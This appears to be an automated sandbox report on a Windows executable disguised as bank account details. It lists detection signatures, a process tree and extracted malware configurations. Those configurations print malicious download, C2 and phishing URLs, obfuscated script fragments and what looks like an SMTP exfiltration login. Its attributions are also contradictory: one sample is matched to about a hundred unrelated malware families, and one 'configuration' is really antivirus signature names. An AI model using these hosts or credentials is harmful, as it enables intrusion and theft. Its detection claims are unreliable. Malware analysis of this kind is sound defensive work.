Loading ...

Play interactive tourEdit tour

Windows Analysis Report Foreign_Bank Account Details.exe

Overview

General Information

Sample Name:Foreign_Bank Account Details.exe
Analysis ID:1613
MD5:8906fa5fed7b1d3d2e5579d97419c076
SHA1:f4488a79fcb657eb1f3f23c6ce181ae7176fb11c
SHA256:d1a3f5513cfaf506e96e6304d259fb03f5dc23542301fc9c7335a6e921ad65f9
Infos:

Most interesting Screenshot:

Detection

RemCom RemoteAdmin Mimikatz HawkEye Imminent Nanocore Remcos GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected PasteDownloader
Detected Hacktool Mimikatz
Yara detected BlackMoon Ransomware
Yara detected Snake Keylogger
Yara detected Ragnarok ransomware
Yara detected Globeimposter Ransomware
Yara detected Evrial Stealer
Yara detected Avaddon Ransomware
Yara detected GhostRat
Yara detected Mini RAT
Yara detected BLACKMatter Ransomware
Yara detected Koadic
Yara detected Jigsaw
Antivirus detection for URL or domain
Yara detected AESCRYPT Ransomware
Yara detected Rapid ransomware
Yara detected RansomwareGeneric
Yara detected Ouroboros ransomware
Yara detected Fiesta Ransomware
Yara detected Lolkek Ransomware
Yara detected LimeRAT
Yara detected GuLoader
Yara detected Chaos Ransomware
Yara detected Hancitor
Yara detected TeslaCrypt Ransomware
Found malware configuration
Yara detected Mock Ransomware
Yara detected Conti ransomware
Yara detected Generic Dropper
Yara detected NoCry Ransomware
Yara detected ByteLocker Ransomware
Yara detected RegretLocker Ransomware
Yara detected Crypt ransomware
Yara detected Meterpreter
Yara detected Clop Ransomware
Yara detected Xmrig cryptocurrency miner
Yara detected ISRStealer
Yara detected LockBit ransomware
Yara detected LOCKFILE ransomware
Yara detected Cerber ransomware
Yara detected Rhino ransomware
Yara detected Niros Ransomware
Yara detected Buran Ransomware
Yara detected VHD ransomware
Yara detected generic Shellcode Injector
Yara detected Netwalker ransomware
Yara detected Vidar stealer
Yara detected Jcrypt Ransomware
Yara detected Delta Ransomware
Yara detected Predator
Yara detected Mimikatz
Detected HawkEye Rat
Detected Remcos RAT
Sigma detected: RegAsm connects to smtp port
Yara detected RevengeRAT
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Yara detected LaZagne password dumper
Yara detected Metasploit Payload
Yara detected LazParking Ransomware
Yara detected Discord Token Stealer
Yara detected MailPassView
Yara detected Parallax RAT
Yara detected GlobeLocker Ransomware
Yara detected Zeppelin Ransomware
Yara detected Apis Ransomware
Yara detected Wannacry ransomware
Yara detected AgentTesla
Yara detected MegaCortex Ransomware
Yara detected Valak
Yara detected AntiVM3
Yara detected Cobra Locker ransomware
Yara detected RekenSom ransomware
Detected Nanocore Rat
Yara detected Babuk Ransomware
Yara detected Nemty Ransomware
Yara detected NetWire RAT
Yara detected Linux EvilGnome RC5 key
Yara detected Clay Ransomware
Yara detected Thanos ransomware
Yara detected CryLock ransomware
Yara detected Pony
Yara detected OCT Ransomware
Yara detected Snatch Ransomware
Yara detected VBKeyloggerGeneric
Yara detected Silvertor Ransomware
Yara detected Coinhive miner
GuLoader behavior detected
Yara detected Annabelle Ransomware
Yara detected Gocoder ransomware
Detected Imminent RAT
Yara detected BitCoin Miner
Yara detected WannaRen ransomware
Multi AV Scanner detection for submitted file
Yara detected Ryuk ransomware
Yara detected Zeoticus ransomware
Yara detected Porn Ransomware
Yara detected DarkSide Ransomware
Malicious sample detected (through community Yara rule)
Yara detected HiddenTear ransomware
Yara detected Telegram RAT
Yara detected WormLocker Ransomware
Yara detected Mailto ransomware
Yara detected Voidcrypt Ransomware
Yara detected Njrat
Yara detected GoGoogle ransomware
Yara detected Axiom Ransomware
Yara detected Artemon Ransomware
Yara detected Betabot
Yara detected Covid19 Ransomware
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Yara detected Nukesped
Yara detected LokiLocker Ransomware
Yara detected Cryptolocker ransomware
Yara detected Marvel Ransomware
Multi AV Scanner detection for domain / URL
Yara detected Codoso Ghost
Yara detected Cute Ransomware
Yara detected 0x0M4R Ransomware
Yara detected Growtopia
Yara detected Windows Security Disabler
Yara detected Amnesia ransomware
Yara detected Dorkbot
Contains VNC / remote desktop functionality (version string found)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
May modify the system service descriptor table (often done to hook functions)
Yara detected AllatoriJARObfuscator
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Found potential ransomware demand text
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Hides threads from debuggers
Writes to foreign memory regions
Yara detected MSILLoadEncryptedAssembly
Binary or sample is protected by dotNetProtector
C2 URLs / IPs found in malware configuration
May enable test signing (to load unsigned drivers)
Deletes shadow drive data (may be related to ransomware)
Found strings related to Crypto-Mining
Tries to detect Any.run
Found Tor onion address
Sample is not signed and drops a device driver
Tries to harvest and steal browser information (history, passwords, etc)
Found string related to ransomware
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
Modifies the hosts file
May drop file containing decryption instructions (likely related to ransomware)
Yara detected Autohotkey Downloader Generic
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Creates driver files
Checks if the current process is being debugged
May initialize a security null descriptor
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
Contains functionality to query the security center for anti-virus and firewall products
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Yara detected RemCom RemoteAdmin tool
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Contains strings related to BOT control commands
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Winexe tool
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Yara detected Keylogger Generic
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
May infect USB drives
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
PE file contains executable resources (Code or Archives)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Uses SMTP (mail sending)
Enables security privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Foreign_Bank Account Details.exe (PID: 7880 cmdline: 'C:\Users\user\Desktop\Foreign_Bank Account Details.exe' MD5: 8906FA5FED7B1D3D2E5579D97419C076)
    • RegAsm.exe (PID: 5916 cmdline: 'C:\Users\user\Desktop\Foreign_Bank Account Details.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • tKZVPq.exe (PID: 2024 cmdline: 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • tKZVPq.exe (PID: 2664 cmdline: 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • mpam-c45e5da5.exe (PID: 3480 cmdline: 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-c45e5da5.exe' /q WD MD5: 443EE02E661D01299DEF051C2990B777)
    • MpSigStub.exe (PID: 3992 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.256.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-c45e5da5.exe /q WD MD5: 01F92DC7A766FF783AE7AF40FD0334FB)
  • wevtutil.exe (PID: 7380 cmdline: C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\DFC5CBF6-B4C4-B49D-335D-ADBEBB78227A.man MD5: C57C1292650B6384903FE6408D412CFA)
    • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • wevtutil.exe (PID: 6888 cmdline: C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\DFC5CBF6-B4C4-B49D-335D-ADBEBB78227A.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' MD5: C57C1292650B6384903FE6408D412CFA)
    • conhost.exe (PID: 5224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • mpam-f54ed867.exe (PID: 4540 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-f54ed867.exe MD5: 34B7B3BDFA61E18D3B2C3B0AC92B78EF)
    • MpSigStub.exe (PID: 7540 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-f54ed867.exe MD5: 01F92DC7A766FF783AE7AF40FD0334FB)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "purchasing@cselegance.comCSE.868mail.cselegance.com"}

Threatname: Pony

{"C2 list": ["http://www.trotux.com/?z=", "http://www.zhongsou.com/kefu/zskf.htm", "http://www.w3.org/1999/xsl/transform", "http://evanstechnology.com", "http://41.59.0.100/intranet", "http://www.microsoft.com", "http://www.direct-ip.com/", "http://downloadfilesldr.com/index5.php?adv=141", "http://spywaresoftstop.com/download/141/setup.exe", "http://service.srvmd6.com/Mac/getInstallerSettings/?version=", "http://gveejlsffxmfjlswjmfm.com/files/", "http://so1.5k5.net/interface?action=install&p=", "http://thespecsupportservice.com/uno.dat", "http://110.42.4.180:", "http://pznjaslo.pl/wp-content/outstanding-invoices/", "http://aindonashi.blogspot.com/", "http://www.alibaba.com", "http://(www|corail)\\\\.sudoc", "http://downloadfilesldr.com/index2.php?adv=141", "http://santasalete.sp.gov.br/jss/", "http://acayipbiri.blogspot.com/", "http://bardubar.com/mMS83JIdhq/ieygBSH38hsJa/", "http://xn--", "http://a.pomf.cat/", "http://cicahroti.blogspot.com/ ", "http://22y456.com/", "http://my-speak.eu/csioj.exe", "http://babukq4e2p4wu4iq.onion", "http://62.210.214.", "http://articlunik.blogspot.com/", "http://spotdewasa.blogspot.com/", "http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/", "http://www.nytimes.com", "http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=", "http://d1.downxia.net/products/", "http://www.gamedanji.cn/ExeIni", "http://aitimatafb.blogspot.com/", "http://berkah2013.blogspot.com/", "http://bigboobsp.blogspot.com/ ", "http://aspeja.org/question/", "http://www.apple.com", "http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/", "http://microhelptech.com/gotoassist/", "http://pastebin.com/", "http://www.fastclick.com", "http://errors.statsmyapp.com", "http://gicia.info/cd/cd.php?id=%s&ver=g", "http://musah.info/", "http://%s/buy_online.php", "http://apee296.co.ke/tatiyv6824540/gescanntes-dokument/zahlungserinnerung", "http://www.tripod.com", "http://batrasiaku.blogspot.com/", "http://gaigoixxx.blogspot.com/ ", "http://www.sqwire.com", "http://arthisoft.blogspot.com/ ", "http://www.steelbendersrfq.cf/", "http://gg", "http://www.", "http://yamaofficial.com/rxuczm/3415201.png", "http://www.xanga.com", "http://www.cnn.com", "http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/", "http://wmwifbajxxbcxmucxmlc.com/files/", "http://81.177.26.20/ayayay", "http://i.compucrush.com/i.php", "http://jugnitv.com/final.jpg", "http://www.consumerinput.com/", "http://104.236.94.", "http://cl.1ck.me/", "http://seuufhehfueughek.ws/", "http://bonkersmen.blogspot.com/", "http://www.j.mp/", "http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe", "http://www.mlb.com", "http://www.friskypotato.com/", "http://tumicy.com/plqijcndwoisdhsaow/", "http://pages", "http://www.yahoo.com", "http://whatami.us.to/tc", "http://darkside", "http://www.monster.com", "http://www.netscape.com", "http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php", "http://200.74.240.151/saturno/w8.txt", "http://downloadfilesldr.com/index4.php?adv=141", "http://download.zhongsou.com/cdsearch/", "http://spywaresoftstop.com/wfdfdghfdghj.htm", "http://brembotembo.com/doc.xls", "http://cts.hotbar.com/trackedevent.aspx", "http://%s/sync.php", "http://31.192.210.", "http://chemgioaz.blogspot.com/ ", "http://likesomessfortelr.eu/mSsNX3JDSJD/inNSj398LSj/", "http://203.199.200.61", "http://www.alexa.com", "http://www.microsoft.com0", "http://8nasrcity.blogspot.com/ ", "http://www.bookiq.bsnl.co.in/data_entry/circulars/m", "http://mydirecttube.com/", "http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/", "http://aolopdephn.blogspot.com/", "http://faithhotelghana.com", "http://94.102.14.", "http://www.diannaowang.com:8080", "http://200.74.240.151/saturno/w7.txt", "http://www.searchmaid.com/", "http://www.moliv.com.br/stat/email0702/", "http://%s%simg.jpg", "http://gosgd.com", "http://owwwc.com/mm/", "http://pig.zhongsou.com/helpsimple/help.htm", "http://avnisevinc.blogspot.com/", "http://hostthenpost.org/uploads/", "http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/", "http://www.lycos.com", "http://192.189.25.17/cgbin/ukbros", "http://208.95.104.", "http://tempuri.org/", "http://afkar.today/test_coming.training/w_f/", "http://tsrv4.ws/", "http://%domain%/config.php", "http://dl.dropbox.com/u/", "http://www.klikspaandelft.nl/", "http://cs.zhongsou.com/", "http://mitotl.com.mx/ups.com/", "http://%s", "http://autothich.blogspot.com/ ", "http://march262020.com/files/", "http://www.pornpassmanager.com/d", "http://www.icq.com", "http://%domain%/update.php", "http://%s:%i%s", "http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&level=%d&gold=%d&stone=%d&cpname", "http://tool.world2.cn/toolbar/", "http://coltaddict.blogspot.com/", "http://alindaenua.blogspot.com/", "http://tinyurl.com/", "http://www.virtrigger.com", "http://qwuyegasd3edarq6yu.org/mSsQDIMIQ/ind7694GDs/", "http://www.niudoudou.com/web/download/", "http://millennium-traders.info", "http://www.youndoo.com/?z=", "http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&i=1a3a1a", "http://200.159.128.", "http://1bestgate.blogspot.com/ ", "http://www.preyer.it/ups.com/", "http://www.adserver.com", "http://5starvideos.com/main/", "http://march262020.club/files/", "http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&dyfm=ywx2yxjvx3zlbgfzy29adndylmnvbq==&dyfm=cpjyicit", "http://www.surprisingdd.top", "http://www.facebook.com/", "http://agressor58.blogspot.com/", "http://arifkacip.blogspot.com/ ", "http://95.173.183.", "http://bittupadam.blogspot.com/", "http://94.103.85.236/ds/11.gif", "http://www.%domain%/updates/check.html", "http://srmvx.com.br/uploads/", "http://webpatch.ragnarok.co.kr/", "http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/", "http://alhalm-now.blogspot.com/", "http://fateh.aba.ae/abc.zip", "http://abeidaman.blogspot.com/ ", "http://131.153.38.125/", "http://www.amazon.com", "http://%s/support.php", "http://50.63.128.", "http://animefrase.blogspot.com/", "http://booknology.com/", "http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/", "http://bgtc.pctonics.com", "http://rentalhabneew.com/", "http://maldonaaloverainc.com/", "http://216.172.172.40/~agora546/cardoso/dilma.zip", "http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk", "http://batysnewskz.kz/ups.com", "http://61.19.253.", "http://downloadfilesldr.com/index3.php?adv=141", "http://%s:%d/%d%s", "http://179.43.158.187/PhtJFr0fvBk2.php", "http://spywaresoftstop.com/load.php?adv=141", "http://wevx.xyz/post.php?uid=", "http://dontkillme/", "http://activecodec.0fees.net/codec/mp3/codec_download.htm", "http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php", "http://highpay.website/css/windows.jar", "http://update.7h4uk.com:443/antivirus.php", "http://update.xiaoshoupeixun.com/tsbho.ini", "http://hotedeals.co.uk/ekck095032/", "http://gosgd2.com", "http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php", "http://sameshitasiteverwas.com/traf/tds/in.cgi", "http://ahmad-roni.blogspot.com/", "http://citw-vol2.blogspot.com/ ", "http://%s:%d/%s%d%08d", "http://kolyherqylwa9ru.top/log.php?f=400\",zigmep0());ixunlaw4=samagsi0[awolgify4()]();ypjatlaci6[ygulsivko6()]=krubyfacifv2();erqylwa9=samagsi0[hojmed4()];geqilra0=wmetoqe0[betyquzt6()];}ixunlaw4=ypjatlaci6[azgorpydbibd4()]();ixunlaw4=ypjatlaci6[ildig0()](erqylwa9);ixunlaw4=ypjatlaci6[onesothaz0()](kqoctim8+lcacsovy5);ixunlaw4=ypjatlaci6[oxkucfur4()]();ixunlaw4=iliqof8[agajdojj9()](rpolje4()+kqoctim8+lcacsovy5,zigmep0());}catch(e){}", "http://f1visa.info/cd/cd.php?id=%s&ver=g", "http://13.233.183.227/de/lngukm2012920/bestellungen/zahlung", "http://cvfanatic.blogspot.com/ ", "http://www.qq994455.com/", "http://20vp.cn/moyu/", "http://www.ebay.com", "http://fateh.aba.ae/xyzx.zip", "http://3dplayful.blogspot.com/ ", "http://vequiato.sites.uol.com.br/", "http://malikberry.com/files101/htamandela.hta", "http://bbc.lumpens.org/", "http://verticalagriculture.net/files/csrss.jar", "http://31.192.209.", "http://31.192.211.", "http://lo0oading.blogspot.com/ ", "http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=", "http://best4hack.blogspot.com/ ", "http://www.mapquest.com", "http://ip-api.com/json/", "http://888888.2288.org/Monitor_INI", "http://te.platrium.com/pte.aspx", "http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.php/?email=kevind@hollywoodwoodwork.com\"target=\"_blank", "http://config.juezhao123.com/c.ashx?ver=&c=", "http://brembotembo.com/2.dat", "http://%s:%i%s?mod=cmd", "http://detayworx.com/_vsnpNgyXp84Os8Xh.php", "http://checkip.dyndns.org/", "http://whenyouplaygood.com/s/gate.php?a\");f[\"\\x73\\x65\\x6e\\x64\"]();eval(f[\"responsetext\"", "http://www.nba.com", "http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/", "http://www.agendagyn.com/media/fotos/2010/", "http://www.thon-samson.be/js/_notes/", "http://anomaniez.blogspot.com/ ", "http://masgiO.info/cd/cd.php?id=%s&ver=g", "http://binyousafindustries.com/fonts/jo/mops.exe", "http://%s/features.php", "http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56", "http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e", "http://92.222.7.", "http://brembotembo.com/1.dat", "http://ow.ly/QoHbJ", "http://%s/v_install?sid=16045&start=1&guid=$__GUID&sig=$__SIG&ovr=$__OVR&browser=$__BROWSER&label=%s&aux=%d", "http://aancyber77.blogspot.com/", "http://2010-kpss.blogspot.com/ ", "http://www.sacbarao.kinghost.net/", "http://downloadfilesldr.com/allfile.jpg", "http://5starvideos.com/main/K", "http://sf3q2wrq34.ddns.net", "http://www.ip2location.com/", "http://88888888.7766.org/ExeIni", "http://worm.ws/", "http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn", "http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiyw", "http://dudethisishowwedoitallnightlong.2myip.net", "http://dmww.dmcast.com/script/update.asp?version=%s", "http://docs.herobo.com", "http://directplugin.com/dialers/", "http://www.xpassgenerator.com/software/d"]}

Threatname: Metasploit

{"Type": "Execute Command", "Command": "\u0001"}

Threatname: CryLock

{"Extensions": "dpost cal ed, module handle  c:\\temp\\co kies.log WantRele !Trickbot.AAA!sms !Trickbotpw.A!mod Grab_Passwords_Chrome(0) Grab_Passwords_Chrome() success Grab_Passwords_Chrome(): Can't open database \\Google\\Chrome\\User Data\\Default\\Login Data.bak [Reflection.Assembly]::LoadFile(\"$binpath\\KeePass.exe\") Write-warning \"Unable Load KeePass Binarys\" Internet Explorer Internet Explorer] !Trickbotem.A!mod Grabbed %s from Inbox Grabbed %s from Contacts Error hiding Outlook from the taskbar Hide Outlook from system tray StartOutlook(): before hide c:\\temp\\mail.log StartOutlook(): ShellExecuteW()  %S %S StartOutlook(): ShellExecuteW()  %S %S] !TrickBot.I!MTB !TrickBot.J!MTB XYXEQX8dMYWKgX8KMNQpqCL \tgMofH.dll !Control !ControlFreeBufferReleaseStart !TrickBot.K!MTB Xvaultcli.dll SysListView32 atl.dll SRVDATA.dll NetServerStart NetServerStop JSRVDATA.dllControlFreeBufferNetServerStartNetServerStopReleaseStart !Trickbot.V!ibt +VC20XC00U Trojan:Win64/TrickInj.A!MTB inj_64.dll [INIT] Inj = %u [INIT] BC = %u [INIT] Proxy = %u #pgid# #pgid#] !TrickBot.A!ibt \\rdpscan.pdb  Control  ControlFreeBufferReleaseStart] TrojanDownloader:O97M/Emotet.QAZ!MTB $TrojanDownloader:O97M/Emotet.QAZ!MTB TrojanDownloader:O97M/Emotet.RAA!MTB $TrojanDownloader:O97M/Emotet.RAA!MTB TrojanDownloader:O97M/Emotet.RAB!MTB $TrojanDownloader:O97M/Emotet.RAB!MTB !Trickbotspr.A!mod CmainSpreader::init() CreateThread, error code %i CmainSpreader::init() CreateEvent, error code %i WormShare lsass.exe End of Romance spreader with module handle 0x%08X is started spreader with module handle 0x%08X is started] !TrickInj.B!MTB inj_32.dll #gid# /QConnection !EmotetCrypt.MR!MTB Trojan:Win64/Trickbot.SS!MTB dllor.dll bEjvvgF7zLSVe7I SKe1E7e1BJnWQG 0qjqOSdonoe2dLUW !ControlFreeBufferReleaseStart] TrojanDownloader:O97M/IcedID.YJ!MTB #TrojanDownloader:O97M/IcedID.YJ!MTB !Trickbot.PN!MSR rdpscan.dll rdpscan.pdb rdpscan.pdb] Behavior:Win32/Trickbot.A!sms !Trickbot.A!sms !Trickbot.B!ibt \\webinject32.pdb \\webinject62.pdb ControlFreeBufferReleaseStart WebInject build %s %s (%s) starting STATIC FAKE rebuild= Injection failure process pid = CheckAndInjectExplorer(): CreateToolhelp32Snapshot(): Chrome is zombie Starting and injecting chrome [INJECT] inject_via_remotethread_wow64 [INJECT] inject_via_remotethread_wow64] !Trickbot.N grab_passwords_chrome() )from logins where blacklisted_by_user = 0 \\default\\login data.bak mimikatz] !Trickbot.O [reflection.assembly]::loadfile(\"  \\keepass.exe\") MTIzNA==; cXdlcg==; MTIzNA==; cXdlcg==;] !TrickbotVP.A!MTB vpnDll build %s %s started VPN bridge failure 11:43 vpnDll.dll WantRelease RasGetConnectStatusA] !Azurlt!MTB U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs SetEnvironmentVariableW CreateProcessAsUserW GlobalMemoryStatus SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA== GDIScreenShot CryptReleaseContext CryptUnprotectData PVAULT_CRED8 Process32NextW uFileFinderU uIE7_decodeU ShellExecuteExW GetLogicalDriveStringsA InternetCrackUrlA HttpAddRequestHeadersA Browsers\\Cookies Browsers\\Cookies] Trojan:Win64/Trickrdp.A!MTB BotID trybrute rdp/names rdp/dict rdp/over rdp/freq rdp/domains rdp/domains] Trojan:Win64/Trickrdp.B!MTB F:\\rdpscan\\Bin\\Release_logged\\x64\\rdpscan.pdb !OceanLotus.AC!MTB 977Lp Trojan:HTML/Phish.JAD!MTB <formaction=http://tenillar.com/ko/pos.phpmethod=post> 8<formaction=http://tenillar.com/ko/pos.phpmethod=post> <formaction=http://185.236.231.209/xcel/copy/xel.phpmethod=post> B<formaction=http://185.236.231.209/xcel/copy/xel.phpmethod=post> <formclass=\"modal-contentanimate\"method=\"post\"action=\"http://185.236.231.210/test/en/dsf.php\"> `<formclass=\"modal-contentanimate\"method=\"post\"action=\"http://185.236.231.210/test/en/dsf.php\"> Behavior:Win32/SvchostInject.B Behavior:Win32/WermgrInject.A .@\t Xp .@  Xp Exploit:O97M/CVE-2017-0199.YAB!MTB \"Exploit:O97M/CVE-2017-0199.YAB!MTB target=\"http://tsdyprivatecloudshareandfileprotectsyta.ydns.eu/receipt/invoice_141140.doc\"targetmode=\"external ptarget=\"http://tsdyprivatecloudshareandfileprotectsyta.ydns.eu/receipt/invoice_141140.doc\"targetmode=\"external TrojanDownloader:O97M/Emotet.RAC!MTB $TrojanDownloader:O97M/Emotet.RAC!MTB Trojan:Win64/Trickbot.A!mod rdpscan.dllControlFreeBufferReleaseStart] Trojan:Win64/TrickbotMshare.A!MTB !Trojan:Win64/TrickbotMshare.A!MTB 7c8DhxWXjErT7C/z7ce 4Pj+/D9oJP4ZJDyoG2j+/D9oJc7qG2j1JD4MuLYLIE+oVg5 PDPqIPj+/D9oJGjcIG4Lswjo IgYMmw4d/CWzmw9a IgYMmw4d/CWzmw9a] Ransom:Win32/CerberCrypt.SU!MTB Trojan:PDF/Phish.SK!MSR !Trickbot.SV!MTB MoveLeft Release] Trojan:PDF/Phish.VT!MSR Stelega.AS!MTB Behavior:Win32/Pacalau.A Behavior:Win32/Rawanpec.A @$^O3 Trojan:Win64/Trickbot.SE !Trickbot.AAB !Trickbot.AAB&@ \"X7fv dllControlFreeBuffer ReleaseStart .dllControlFr eBuffer eBufferNetServerStartNetServerStopReleaseStart Backwar .dllBackwar Forward Pause ControlForwardFreeBufferPauseReleaseReverse ControlCreateInstanceF eeBuffer eeBufferReleaseStart ?Stop@@ .dll?Stop@@ .dllControlFreeBuffer OnLoad OnUnload OnUnloadReleaseStart ?DLLControl@@@@ .dllControl?DLLControl@@@@ ?DLLFreeBuffer@@ 0?DLLFreeBuffer@@ ?DLLRelease@@ 0?DLLRelease@@ ?DLLStart@@ 0?DLLStart@@ @FreeBufferRelease ?Find@@Y ?Init@@Y ?Shutdown@@Y _Control@ .dll_Control@ _FreeBuffer@ _Release@ _Start@ ?ReleaseA@@Y .dllControlFreeBufferRelease?ReleaseA@@Y .dll?ReleaseA@@Y AboutDialogP .dllAboutDialogP ocControlDllRegisterServerDll nregisterServer JNI_OnLoad JNI_OnUnload nregisterServerFreeBufferJNI_OnLoadJNI_OnUnloadReleaseStart !Trickbot.ZC core-parser.dll BanRule ClearRules ConfigInitDpost ConfigInitDynamic ConfigInitStatic EnumDpostServer core-parser.dllBanRuleClearRulesConfigInitDpostConfigInitDynamicConfigInitStaticEnumDpostServer /rcrd/ /getq/ /snapshoot/ /rcrd//getq//snapshoot/ Behavior:Win32/TrickBot.B!nri !Invacert.A!MSR !Trickbot.ZD F:\\Projects\\WebInject\\bin\\x86\\Release_logged\\payload32.pdb Payload (build %s %s) injected D$LDS D$QY3 !Xtrat!MSR  Ea.,g Behavior:Win32/BDNS.S @ %program_files% Behavior:Win32/BDNS.R Behavior:Win32/BDNS.X SuspUnixReShellCmd.O /bin/ AGamarue !Gamaure !Nivdort.DH watch_dog_name.exe /index.php?data= ADRIANCOPILULMINUNESIFLORINSALAM ADRIANCOPILULMINUNESIFLORINSALAM] !Obfuscator.TX 